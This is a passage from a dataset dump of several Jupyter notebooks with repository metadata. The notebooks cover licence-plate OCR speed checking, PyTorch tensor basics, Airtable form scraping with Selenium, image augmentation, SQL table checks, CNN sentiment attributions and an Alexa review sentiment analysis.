],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb50d9419bfd1604739e44bf04182173503828ec | 237,161 | ipynb | Jupyter Notebook | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | 658.780556 | 129,920 | 0.95186 | [
[
[
"#importing libraries\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport imutils\nimport easyocr\nfrom datetime import datetime\nimport mysql.connector\nfrom csv import writer",
"_____no_output_____"
],
[
"#importing image and converting into grayscale\nimg = cv2.imread('image3.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nplt.imshow(gray)",
"_____no_output_____"
],
[
"#Decting Edge\nbfilter = cv2.bilateralFilter(gray, 11, 17, 17) #Noise reduction\nedged = cv2.Canny(bfilter, 30, 200) #Edge detection\nplt.imshow(edged)",
"_____no_output_____"
],
[
"#Finding Contours\nkeypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n\nlocation = None\nfor contour in contours:\n approx = cv2.approxPolyDP(contour, 10, True)\n if len(approx) == 4:\n location = approx\n break\n \nlocation",
"_____no_output_____"
],
[
"#Finding the location\nmask = np.zeros(gray.shape, np.uint8)\nnew_image = cv2.drawContours(mask, [location], 0,255, -1)\nnew_image = cv2.bitwise_and(img, img, mask=mask)\nplt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))",
"_____no_output_____"
],
[
"#Cropping the image and turning into grayscale\n(x,y) = np.where(mask==255)\n(x1, y1) = (np.min(x), np.min(y))\n(x2, y2) = (np.max(x), np.max(y))\ncropped_image = gray[x1:x2+1, y1:y2+1]\nplt.imshow(cv2.cvtColor(cropped_image, cv2.COLOR_BGR2RGB))",
"_____no_output_____"
],
[
"#Using OCR\nreader = easyocr.Reader(['en'])\nresult = reader.readtext(cropped_image)\nresult",
"_____no_output_____"
],
[
"#Results\ntext2=\"\"\nif len(result)>1:\n text = result[0][-2]+\" \"+result[1][-2]\nelse:\n text = result[0][-2]\nfor i in text:\n if i==\",\" or i==\".\" or i.isspace():\n i=\"\"\n text2+=i\ntext2 = text2.upper()\nprint(text2)",
"PL8REC\n"
],
[
"#Searching in database\ndb2 = mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"root\",database=\"iip\")\nmycursor2 = db2.cursor()\nmycursor2.execute(\"SELECT numberplate, time FROM vehicle WHERE numberplate = %s\",(text2,))\nmyresult = mycursor2.fetchall()\nrow_count = mycursor2.rowcount\nprint (\"number of affected rows: {}\".format(row_count))\nif row_count == 0:\n print (\"It Does Not Exist\")\nelse:\n tme=myresult[0][1]\n date_from_sql = tme.strftime('%H:%M:%S')\n date_from_sql = datetime.strptime(date_from_sql, '%H:%M:%S')\n now = datetime.now()\n formatted_date = now.strftime('%H:%M:%S')\n formatted_date = datetime.strptime(formatted_date, '%H:%M:%S')\n delta = formatted_date - date_from_sql\n diff=delta.seconds\n print(diff)",
"number of affected rows: 1\n8\n"
],
[
"#Adding to CSV file\nmax_speed = 30 #in Km/h\ndistance = 1 #in Km\navg_spd = distance/(diff/3600)\nprint(avg_spd)\nif(max_speed < avg_spd):\n print(\"The average speed of car is higher than max speed\")\n ls = [myresult[0][0], avg_spd]\n with open('car.csv', 'a') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(ls)\n f_object.close()\n ",
"450.0\nThe average speed of car is higher than max speed\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb50ded82afb67e32bed72777db8775d3df91ceb | 30,654 | ipynb | Jupyter Notebook | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | 20.938525 | 329 | 0.467247 | [
[
[
"# Matrizes, Arrays, Tensores",
"_____no_output_____"
],
[
"## Referências",
"_____no_output_____"
],
[
"- Documentação oficial de Tensores do PyTorch\n http://pytorch.org/docs/master/tensors.html\n- PyTorch para usuários NumPy:\n https://github.com/torch/torch7/wiki/Torch-for-Numpy-users",
"_____no_output_____"
],
[
"## NumPy array",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"a = np.array([[2., 8., 3.],\n [0.,-1., 5.]])\na",
"_____no_output_____"
],
[
"a.shape",
"_____no_output_____"
],
[
"a.dtype",
"_____no_output_____"
]
],
[
[
"## PyTorch tensor",
"_____no_output_____"
],
[
"Os tensores do PyTorch só podem ser float, float32 ou float64",
"_____no_output_____"
]
],
[
[
"import torch",
"_____no_output_____"
]
],
[
[
"### Convertendo NumPy array para tensor PyTorch",
"_____no_output_____"
]
],
[
[
"b = torch.Tensor(np.zeros((3,4)))\nb",
"_____no_output_____"
]
],
[
[
"### Criando arrays e tensores constantes",
"_____no_output_____"
]
],
[
[
"c = np.ones((2,4)); c",
"_____no_output_____"
],
[
"d = torch.ones((2,4)); d",
"_____no_output_____"
]
],
[
[
"### Criando arrays e tensores aleatórios",
"_____no_output_____"
]
],
[
[
"e = np.random.rand(2,4); e",
"_____no_output_____"
],
[
"f = torch.rand(2,4); f",
"_____no_output_____"
]
],
[
[
"### Arrays aleatórios com semente, para reproduzir mesma sequência pseudoaleatória",
"_____no_output_____"
]
],
[
[
"np.random.seed(1234)\ne = np.random.rand(2,4);e",
"_____no_output_____"
],
[
"torch.manual_seed(1234)\nf = torch.rand(2,4); f",
"_____no_output_____"
]
],
[
[
"### Torch seed is different for GPU",
"_____no_output_____"
]
],
[
[
"if torch.cuda.is_available():\n torch.cuda.torch.manual_seed(1234)\n g = torch.cuda.torch.rand(2,4)\n print(g)",
"\n 0.0290 0.4019 0.2598 0.3666\n 0.0583 0.7006 0.0518 0.4681\n[torch.FloatTensor of size 2x4]\n\n"
]
],
[
[
"## Conversões entre NumPy e Tensores PyTorch",
"_____no_output_____"
],
[
"### NumPy para Tensor PyTorch utilizando `.from_numpy()` - CUIDADO",
"_____no_output_____"
],
[
"Não são todos os tipos de elementos do array NumPy que podem ser convertidos \npara tensores PyTorch. Abaixo é um programa que cria uma tabela de equivalencias\nentre os tipos do NumPy e os tipos do Tensor PyTorch:",
"_____no_output_____"
]
],
[
[
"import pandas as pd \ndtypes = [np.uint8, np.int32, np.int64, np.float32, np.float64, np.double]\ntable = np.empty((2, len(dtypes)),dtype=np.object)\nfor i,t in enumerate(dtypes):\n a = np.array([1],dtype=t)\n ta = torch.from_numpy(a)\n table[0,i] = a.dtype.name\n table[1,i] = type(ta).__name__\npd.DataFrame(table)",
"_____no_output_____"
]
],
[
[
"### NumPy para Tensor utilizando `torch.FloatTensor()` - método recomendado",
"_____no_output_____"
],
[
"Existe uma cuidado importante a ser tomado na transformação de matrizes do NumPy para tensores PyTorch pois as funções de rede neurais do PyTorch utilizam o tipo FloatTensor e o NumPy utiliza como default o tipo float64, o que faz uma conversão automática para DoubleTensor do PyTorch e consequentemente gerando um erro.\nA recomendação é utilizar o `torch.FloatTensor` para converter NumPy para tensores PyTorch:",
"_____no_output_____"
]
],
[
[
"a = np.ones((2,5))\na_t = torch.FloatTensor(a)\na_t",
"_____no_output_____"
]
],
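[
[
"# A quick check (a sketch, reusing the np and torch imports above): torch.from_numpy keeps\n# NumPy's default float64 and yields a DoubleTensor, while torch.FloatTensor casts to float32,\n# which is the type the neural network functions expect.\na64 = torch.from_numpy(np.ones((2, 5)))\na32 = torch.FloatTensor(np.ones((2, 5)))\nprint(a64.type(), a32.type())",
"_____no_output_____"
]
],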
[
[
"### Tensor PyTorch para array NumPy",
"_____no_output_____"
]
],
[
[
"ta = torch.ones(2,3)\nta",
"_____no_output_____"
],
[
"a = ta.numpy()\na",
"_____no_output_____"
]
],
[
[
"## Tensor na CPU e na GPU",
"_____no_output_____"
]
],
[
[
"ta_cpu = torch.ones(2,3); ta_cpu",
"_____no_output_____"
],
[
"if torch.cuda.is_available():\n ta_gpu = ta_cpu.cuda()\n print(ta_gpu)",
"\n 1 1 1\n 1 1 1\n[torch.cuda.FloatTensor of size 2x3 (GPU 0)]\n\n"
]
],
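[
[
"# Optional sketch (assumes PyTorch >= 0.4): a device-agnostic way to move tensors,\n# equivalent to the .cuda() call above but falling back to the CPU when no GPU is available.\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nta_dev = ta_cpu.to(device)\nprint(ta_dev.device)",
"_____no_output_____"
]
],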
[
[
"## Operações em tensores",
"_____no_output_____"
],
[
"### criação de tensor e visualização do seu shape",
"_____no_output_____"
]
],
[
[
"a = torch.eye(4); a",
"_____no_output_____"
],
[
"a.size()",
"_____no_output_____"
]
],
[
[
"### Reshape é feito com `view` em PyTorch",
"_____no_output_____"
]
],
[
[
"b = a.view(2,8); b",
"_____no_output_____"
]
],
[
[
"Aqui é um exemplo criando um tensor unidimensional sequencial de 0 a 23 e em seguida uma reshape para\nque o tensor fique com 4 linhas e 6 colunas",
"_____no_output_____"
]
],
[
[
"a = torch.arange(0,24).view(4,6);a",
"_____no_output_____"
]
],
[
[
"### Adição elemento por elemento",
"_____no_output_____"
],
[
"#### usando operadores",
"_____no_output_____"
]
],
[
[
"c = a + a; c",
"_____no_output_____"
],
[
"d = a - c ; d",
"_____no_output_____"
]
],
[
[
"#### forma funcional",
"_____no_output_____"
]
],
[
[
"d = a.sub(c); d",
"_____no_output_____"
]
],
[
[
"#### Operação in-place",
"_____no_output_____"
]
],
[
[
"a.sub_(c); a",
"_____no_output_____"
]
],
[
[
"### Multiplicação elemento por elemento",
"_____no_output_____"
]
],
[
[
"d = a * c; d ",
"_____no_output_____"
],
[
"d = a.mul(c); d",
"_____no_output_____"
],
[
"a.mul_(c); a",
"_____no_output_____"
]
],
[
[
"### Média em tensores",
"_____no_output_____"
]
],
[
[
"a = torch.arange(0,24).view(4,6); a",
"_____no_output_____"
],
[
"u = a.mean(); u",
"_____no_output_____"
],
[
"uu = a.sum()/a.nelement(); uu",
"_____no_output_____"
]
],
[
[
"### Média com redução de eixo ",
"_____no_output_____"
]
],
[
[
"u_row = a.mean(dim=1); u_row",
"_____no_output_____"
],
[
"u_col = a.mean(dim=0); u_col",
"_____no_output_____"
]
],
[
[
"### Desvio padrão",
"_____no_output_____"
]
],
[
[
"std = a.std(); std",
"_____no_output_____"
],
[
"std_row = a.std(dim=1); std_row",
"_____no_output_____"
]
],
[
[
"## Comparação speedup CPU e GPU",
"_____no_output_____"
]
],
[
[
"a_numpy_cpu = np.ones((1000,1000))\n%timeit b = 2 * a_numpy_cpu\na_torch_cpu = torch.ones(1000,1000)\n%timeit b = 2 * a_torch_cpu",
"1.36 ms ± 102 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n441 µs ± 1.11 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n"
],
[
"if torch.cuda.is_available():\n a_torch_gpu = a_torch_cpu.cuda()\n %timeit b = 2 * a_torch_gpu",
"41.7 µs ± 41.8 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n"
]
],
[
[
"Rodando o código abaixo na GTX1080: speedup de 15,5\n- 888 µs ± 43.4 ns per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n- 57.1 µs ± 22.7 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)\nRodando no macbook:\n- numpy: 1000 loops, best of 3: 449 µs per loop\n- torch: 1000 loops, best of 3: 1.6 ms per loop",
"_____no_output_____"
]
],
[
[
"%timeit b1 = a_numpy_cpu.mean()\n%timeit b2 = a_torch_cpu.mean()\nif torch.cuda.is_available():\n %timeit c = a_torch_gpu.mean()",
"433 µs ± 9.54 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n792 µs ± 11.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n80.7 µs ± 1.82 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb50e50db08cbc3b63077d8a49098754d5d5ff9a | 3,633 | ipynb | Jupyter Notebook | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | 29.064 | 319 | 0.536746 | [
[
[
"<a href=\"https://colab.research.google.com/github/cscampana/Apache-Maven-Beginner-to-Guru/blob/master/Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# Using BeautifulSoup with Selenium to extract single selects content from Airtable\n\nWe use Selenium with BeautifulSoup to extract all items in single selects within an Airtable form and print them in the console.\n\nThe element class is flex-auto truncate-pre for all single selects.\n",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport requests\nimport sys",
"_____no_output_____"
],
[
"#Dependency install\n%%capture\n!pip install selenium\n!apt-get update # to update ubuntu to correctly run apt install\n!apt install chromium-chromedriver\n!cp /usr/lib/chromium-browser/chromedriver /usr/bin\nsys.path.insert(0,'/usr/lib/chromium-browser/chromedriver')\n\n\nfrom selenium import webdriver\n\n# Chrome configuration\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\n\n# Selenium request\nwd = webdriver.Chrome('chromedriver',chrome_options=chrome_options)",
"_____no_output_____"
]
],
[
[
"Input the complete URL of the form in the following box:",
"_____no_output_____"
]
],
[
[
"url = input(\"Complete url of the form: \")",
"_____no_output_____"
],
[
"# Url content retrieve and parser.\n\nwd.get(url)\nhtml = wd.page_source\nsoup = BeautifulSoup(html, 'html.parser')\ncolleges = soup.find_all(class_=\"flex-auto truncate-pre\", text=True)\n# Output\nfor div in colleges:\n print(div.text)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb50eacf0e8112a4ed6f88b65d535e22526c6d65 | 975,277 | ipynb | Jupyter Notebook | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | 1 | 2021-05-15T13:35:52.000Z | 2021-05-15T13:35:52.000Z | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | null | null | null | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | null | null | null | 3,229.39404 | 247,020 | 0.965063 | [
[
[
"from DataGenerator import DataGenerator\n%pylab inline",
"Populating the interactive namespace from numpy and matplotlib\n"
],
[
"dg = DataGenerator(5, 10, \"d:/Adrien/dataset/GlaS/train\")",
"_____no_output_____"
],
[
"j = 0\nfor batch_x,batch_y in dg.next_batch(1):\n print(batch_x.min(),batch_x.max())\n for i in range(1):\n plt.figure()\n plt.imshow(batch_x[i])\n plt.contour(batch_y[i])\n plt.show()\n j += 1\n if j > 3:\n break",
"0.0 1.0000110234735244\n"
],
[
"batch_x,batch_y = DataGenerator._DataGenerator__augment(batch_x, batch_y)",
"_____no_output_____"
],
[
"print(batch_y.max())\nfor i in range(5):\n plt.figure()\n plt.imshow(batch_x[i]+.5)\n plt.contour(batch_y[i])\n plt.show()",
"_____no_output_____"
],
[
"im = dg.images[dg.train_idxs[0]]\nanno = dg.annotations[dg.train_idxs[0]]",
"_____no_output_____"
],
[
"plt.figure()\nplt.imshow(im)\nplt.contour(anno)\nplt.show()",
"_____no_output_____"
],
[
"# Vertical flip:\nim2 = im[::-1,:,:]\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"# Horizontal flip\nim2 = im[:,::-1,:]\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"# Random noise\nim2 = np.clip(im + np.random.normal(0, 0.1, size=im.shape),0,1)\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"from skimage.transform import rotate\nim2 = rotate(im, angle=int(np.random.random()*360))\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"print(((np.random.random()<0.5)-0.5)*2)",
"_____no_output_____"
],
[
"def augment(x, y):\n # apply to x & y\n flip_h = int(((np.random.random()<0.5)-0.5)*2)\n flip_v = int(((np.random.random()<0.5)-0.5)*2)\n rotation = int(np.random.random()*360)\n \n # apply to x only\n noise = np.random.normal(0, 0.1, size=x.shape)\n \n x = np.clip(rotate(x[::flip_v,::flip_h]+noise, angle=rotation), 0, 1)\n y = rotate(y[::flip_v,::flip_h], angle=rotation)\n return x,y",
"_____no_output_____"
],
[
"x2,y2 = augment(im, anno)\nplt.figure()\nplt.imshow(x2)\nplt.contour(y2)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb50f5eab7d4c0c799b82ab9369b14cfc5275eb4 | 15,855 | ipynb | Jupyter Notebook | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | 30.846304 | 307 | 0.408515 | [
[
[
"%load_ext sql",
"_____no_output_____"
],
[
"%sql postgresql://student:[email protected]/sparkifydb",
"_____no_output_____"
],
[
"%sql SELECT * FROM songplays LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM users LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM songs LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM artists LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM time LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
]
],
[
[
"## REMEMBER: Restart this notebook to close connection to `sparkifydb`\nEach time you run the cells above, remember to restart this notebook to close the connection to your database. Otherwise, you won't be able to run your code in `create_tables.py`, `etl.py`, or `etl.ipynb` files since you can't make multiple connections to the same database (in this case, sparkifydb).",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb50fe050f967fb36cb1ecf8f7ce9734ca4e92fa | 173,032 | ipynb | Jupyter Notebook | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
] | 145 | 2020-02-10T23:55:17.000Z | 2022-03-25T18:05:57.000Z | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
] | 7 | 2020-09-10T11:53:32.000Z | 2021-11-11T17:53:23.000Z | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
] | 23 | 2020-02-19T14:18:47.000Z | 2021-12-14T01:57:44.000Z | 262.567527 | 11,704 | 0.92732 | [
[
[
"import sys\nsys.path.append('../transformers/')",
"_____no_output_____"
],
[
"import tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pickle\nfrom tqdm import tqdm\n\nfrom path_explain import utils\nfrom plot.text import text_plot, matrix_interaction_plot, bar_interaction_plot\nfrom model import cnn_model\n\nfrom embedding_explainer import EmbeddingExplainerTF",
"_____no_output_____"
],
[
"utils.set_up_environment(visible_devices='3')",
"_____no_output_____"
],
[
"encoder = tfds.features.text.TokenTextEncoder.load_from_file('encoder')",
"_____no_output_____"
],
[
"model = tf.keras.models.load_model('model.h5')",
"_____no_output_____"
],
[
"interpret_model = cnn_model(encoder.vocab_size, for_interpretation=True)",
"_____no_output_____"
],
[
"interpret_model.load_weights('model.h5', by_name=True)",
"_____no_output_____"
],
[
"sentences = [\n 'This movie was bad',\n 'This movie was not bad',\n 'A movie',\n 'A bad movie',\n 'A bad, terrible movie',\n 'A bad, terrible, awful movie',\n 'A bad, terrible, awful, horrible movie'\n]\n\nids_list = []\nfor sentence in sentences:\n ids = encoder.encode(sentence)\n ids = np.array(ids)\n ids = np.pad(ids, pad_width=(0, max(0, 52 - len(ids))))\n ids_list.append(ids)\nids_list = np.stack(ids_list, axis=0)",
"_____no_output_____"
],
[
"model(ids_list)",
"_____no_output_____"
],
[
"embedding_model = tf.keras.models.Model(model.input, model.layers[1].output)",
"_____no_output_____"
],
[
"embeddings = embedding_model(ids_list)",
"_____no_output_____"
],
[
"baseline_embedding = embedding_model(np.zeros((1, 52), dtype=np.float32))",
"_____no_output_____"
],
[
"explainer = EmbeddingExplainerTF(interpret_model)",
"_____no_output_____"
],
[
"attributions = explainer.attributions(inputs=embeddings,\n baseline=baseline_embedding,\n batch_size=128,\n num_samples=256,\n use_expectation=False,\n output_indices=0,\n verbose=True)",
"100%|██████████| 7/7 [00:00<00:00, 16.78it/s]\n"
],
[
"interactions = explainer.interactions(inputs=embeddings,\n baseline=baseline_embedding,\n batch_size=128,\n num_samples=256,\n use_expectation=False,\n output_indices=0,\n verbose=True)",
"100%|██████████| 7/7 [00:17<00:00, 2.43s/it]\n"
],
[
"encoder.decode(ids_list[i]).split(' ')",
"_____no_output_____"
],
[
"i = 1\ntext_plot('this movie was not bad'.split(' '), attributions[i], include_legend=True)\nplt.savefig('movie_not_bad_cnn_text.pdf')",
"_____no_output_____"
],
[
"i = 1\nmatrix_interaction_plot(interactions[i, ids_list[i] != 0][:, :5], encoder.decode(ids_list[i]).split(' '))\nplt.savefig('not_bad_cnn_matrix.pdf')",
"_____no_output_____"
],
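[
"# `plot_all` is called in the next cells but not defined anywhere in this notebook;\n# a hypothetical stand-in (an assumption, not the authors' helper) could wrap the\n# text_plot call used above for an arbitrary sentence index i:\ndef plot_all(i):\n    tokens = encoder.decode(ids_list[i]).split(' ')\n    text_plot(tokens, attributions[i], include_legend=True)\n    plt.show()",
"_____no_output_____"
],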
[
"plot_all(0)",
"_____no_output_____"
],
[
"plot_all(1)",
"_____no_output_____"
],
[
"plot_all(2)",
"_____no_output_____"
],
[
"plot_all(3)",
"_____no_output_____"
],
[
"plot_all(4)",
"_____no_output_____"
],
[
"plot_all(5)",
"_____no_output_____"
],
[
"plot_all(6)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5105d92353618a2e1c60fe4deb0cf2d9073964 | 50,395 | ipynb | Jupyter Notebook | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | Amazon-Alexa-Review/Sentiment_Analysis_Assessment_Amazon-Alexa-Review_Mayank-Lohani.ipynb | mayanklohani19/ga-learner-dst-repo | 3b3ab5e3ce5775e827cf9e3affdf44a17f51abe0 | [
"MIT"
] | null | null | null | 100.79 | 24,696 | 0.831531 | [
[
[
"# import packages\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score\nfrom imblearn.over_sampling import SMOTE\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n",
"_____no_output_____"
]
],
[
[
"### Load the dataset\n\n- Load the train data and using all your knowledge try to explore the different statistical properties of the dataset.",
"_____no_output_____"
]
],
[
[
"# Code starts here\n\n# load data\ndf = pd.read_csv(\"train.csv\")\n\n# Converting date attribute from string to datetime.date datatype \ndf['date'] = pd.to_datetime(df['date'])\n\n# # calculate the total length of word\ndf['length'] = df['verified_reviews'].apply(len)\n\ndf.head()\n# # Code ends here",
"_____no_output_____"
]
],
[
[
"### Visualize and Preprocess the data\n\n- Visualize the different features of your interest\n- Retaining only alphabets (Using regular expressions)\n- Removing stopwords (Using nltk library)",
"_____no_output_____"
]
],
[
[
"## Rating vs feedback\n\n# set figure size\nplt.figure(figsize=(15,7))\n\n# generate countplot\nsns.countplot(x=\"rating\", hue=\"feedback\", data=df)\n\n# display plot\nplt.show()\n\n\n## Product rating vs feedback\n\n# set figure size\nplt.figure(figsize=(15,7))\n\n# generate barplot\nsns.barplot(x=\"rating\", y=\"variation\", hue=\"feedback\", data=df, ci = None)\n\n# display plot\nplt.show()",
"_____no_output_____"
],
[
